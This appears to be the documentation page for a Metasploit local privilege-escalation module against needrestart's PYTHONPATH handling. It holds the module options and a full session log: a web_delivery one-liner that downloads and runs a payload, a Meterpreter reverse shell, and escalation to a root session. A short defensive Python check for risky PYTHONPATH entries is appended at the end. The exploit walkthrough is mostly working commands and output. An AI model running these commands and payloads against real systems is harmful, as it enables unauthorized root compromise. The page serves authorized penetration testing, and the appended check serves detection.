documentation/modules/exploit/linux/local/ubuntu_needrestart_lpe.md
Local attackers can execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable.
Verified against Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1.
Exploitation against vulnerable needrestart versions on Debian 12 and Fedora 39 was unsuccessful; however, install and run instructions are listed below.
Debian 12
Install: apt-get install needrestart=3.6-4+deb12u1
Binary location: /usr/sbin/needrestart
Fedora 39
Install: dnf install needrestart-3.6-9.fc39.noarch
Binary location: /usr/sbin/needrestart
use exploit/linux/local/ubuntu_needrestart_lpe
set lhost <ip>
set lport <port>
set session <session>
run
The maximum number of seconds to wait for a session. Defaults to 90,000 which is 25 hours.
Gain initial shell
msf > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set target 7
target => 7
msf exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(multi/script/web_delivery) > set lport 4998
lport => 4998
msf exploit(multi/script/web_delivery) > set srvport 8998
srvport => 8998
msf exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 1.1.1.1:4998
[*] Using URL: http://1.1.1.1:8998/dKtdkMS
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Ejq8lHli --no-check-certificate http://1.1.1.1:8998/dKtdkMS; chmod +x Ejq8lHli; ./Ejq8lHli& disown
[*] 2.2.2.2 web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4998 -> 2.2.2.2:52004) at 2024-11-22 12:07:55 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: h00die
meterpreter > background
[*] Backgrounding session 1...
Priv Esc
msf exploit(multi/script/web_delivery) > use exploit/linux/local/ubuntu_needrestart_lpe
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(linux/local/ubuntu_needrestart_lpe) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(linux/local/ubuntu_needrestart_lpe) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(linux/local/ubuntu_needrestart_lpe) > set lport 4977
lport => 4977
msf exploit(linux/local/ubuntu_needrestart_lpe) > set session 1
session => 1
msf exploit(linux/local/ubuntu_needrestart_lpe) > set verbose true
verbose => true
msf exploit(linux/local/ubuntu_needrestart_lpe) > run
[*] Started reverse TCP handler on 1.1.1.1:4977
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable needrestart version 3.5-5ubuntu2.1 detected on Ubuntu 22.04
[*] Writing '/tmp/.1K8Hy2tOtq' (250 bytes) ...
[*] Uploading payload: /tmp/.1K8Hy2tOtq
[*] Creating directory /tmp/importlib
[*] /tmp/importlib created
[*] Uploading c_stub: /tmp/importlib/__init__.so
[*] Uploading py_script: /tmp/.FzzlJ
[*] Launching exploit, and waiting for needrestart to run...
On the remote Ubuntu box run sudo needrestart
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] chown: changing ownership of '/tmp/.1K8Hy2tOtq': Operation not permitted
[*] Error processing line 1 of /usr/lib/python3/dist-packages/zope.interface-5.4.0-nspkg.pth:
[*]
[*] Traceback (most recent call last):
[*] File "/usr/lib/python3.10/site.py", line 192, in addpackage
[*] exec(line)
[*] File "<string>", line 1, in <module>
[*] ImportError: dynamic module does not define module export function (PyInit_importlib)
[*]
[*] Remainder of file ignored
[*] #########################
[*]
[*] Dont mind the error message above
[*]
[*] Waiting for needrestart to run...
[*] Payload owned by: root
[+] Deleted /tmp/.1K8Hy2tOtq
[+] Deleted /tmp/.FzzlJ
[+] Deleted /tmp/importlib
[*] Meterpreter session 2 opened (1.1.1.1:4977 -> 2.2.2.2:57644) at 2024-11-22 12:08:28 -0500
meterpreter >
meterpreter > getuid
Server username: root
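
A defender-side check for the condition described at the top of this page, as an added example that is not part of the Metasploit module or of needrestart: it parses a /proc/<pid>/environ blob and flags PYTHONPATH entries that are world-writable or that shadow a standard-library package, such as the /tmp/importlib/__init__.so layout in the output above. The function names, the STDLIB_NAMES list and the sample data are assumptions constructed for illustration.

```python
import glob
import os
import stat
import tempfile

# Standard-library names to watch for. "importlib" is the one visible in the
# module output above; the other names are assumptions added for illustration.
STDLIB_NAMES = ("importlib", "encodings", "site", "os")

def parse_environ(blob):
    """Parse the NUL-separated KEY=VALUE layout of /proc/<pid>/environ."""
    env = {}
    for item in blob.split(b"\0"):
        key, sep, value = item.partition(b"=")
        if sep:
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env

def audit_pythonpath(environ_blob):
    """Return sorted (path, reason) findings for risky PYTHONPATH entries."""
    findings = set()
    pythonpath = parse_environ(environ_blob).get("PYTHONPATH", "")
    for entry in filter(None, pythonpath.split(":")):
        if not os.path.isabs(entry):
            findings.add((entry, "relative entry"))  # depends on the process cwd
            continue
        try:
            mode = os.stat(entry).st_mode
        except OSError:
            continue  # missing entry: nothing can be imported from it
        if stat.S_ISDIR(mode) and mode & stat.S_IWOTH:
            findings.add((entry, "world-writable directory"))
        for name in STDLIB_NAMES:
            pkg = os.path.join(entry, name)
            if os.path.isfile(pkg + ".py") or os.path.isdir(pkg):
                findings.add((pkg, "shadows standard-library module"))
            # __init__.so or an ABI-tagged variant such as __init__.abi3.so
            if glob.glob(os.path.join(glob.escape(pkg), "__init__.*so")):
                findings.add((pkg, "package initialised by native code"))
    return sorted(findings)

def constructed_sample():
    """Build a constructed layout like the one in the output and audit it."""
    root = tempfile.mkdtemp()
    os.chmod(root, 0o777)  # constructed stand-in for a world-writable /tmp
    os.mkdir(os.path.join(root, "importlib"))
    open(os.path.join(root, "importlib", "__init__.so"), "wb").close()
    blob = b"HOME=/home/user\0PYTHONPATH=" + root.encode() + b"\0"
    return root, audit_pythonpath(blob)
```

On a live host the input would be the bytes read from /proc/<pid>/environ of a process of interest, which requires root for processes owned by other users.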